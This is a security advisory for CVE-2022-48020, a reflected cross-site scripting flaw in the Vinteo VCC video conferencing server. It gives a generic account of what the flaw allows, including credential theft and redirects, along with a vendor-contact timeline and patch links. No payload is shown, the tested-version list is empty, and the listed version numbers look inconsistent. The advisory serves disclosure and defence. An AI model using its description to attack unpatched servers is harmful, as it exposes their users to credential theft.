| Title: Reflected Cross-Site Scripting (XSS) | Product: Vinteo VCC | Vulnerable Version: version 2.36.4 | Fixed Version: version 28.1.3 |
| CVE Number: CVE-2022-48020 | Impact: medium | Homepage: https://vinteo.com/en/ | Found: October 2022 |
| By: D. Kiryukhin (Office Moscow) | SEQ LLC |
Vinteo Video Core is a software server, the core of video conferencing and communication system.
With Vinteo Video Core, you can connect up to 1,000 participants to videoconferencing simultaneously.
The solution supports advanced WebRTC technology, which allows you to connect to videoconferencing
using a browser directly and does not require the installation of specialized software.
Source: https://vinteo.com/en/vinteo-solutions/vinteo-video-core
The vendor provides a patch with new version of product and users of this product are urged to immediately upgrade to the latest version available.
SEQ LLC recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues.
Reflected Cross-Site Scripting (CVE-2022-48020)
With reflected cross-site scripting, an attacker can inject arbitrary HTML or JavaScript code into the victim’s web browser. Once the victim clicks a malicious link, the attacker’s code is executed in the context of the victim’s web browser. The vulnerability can be used to change the contents of the displayed site, redirect to other sites or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript trojans.
The following version was tested and found to be vulnerable:
2022-10-25: Contacting vendor through email
2022-12-21: Contacting vendor through email with information about applying to MITRE
The vendor provides an updated version which should be installed immediately:
https://vinteo.com/ru/news/463-obnovlenie-bezopasnosti-servera-vks-vinteo-2
https://seq.team/en/blog/reflected-cross-site-scripting-xss-in-vinteo-vcc/
EOF D. Kiryukhin / @2022
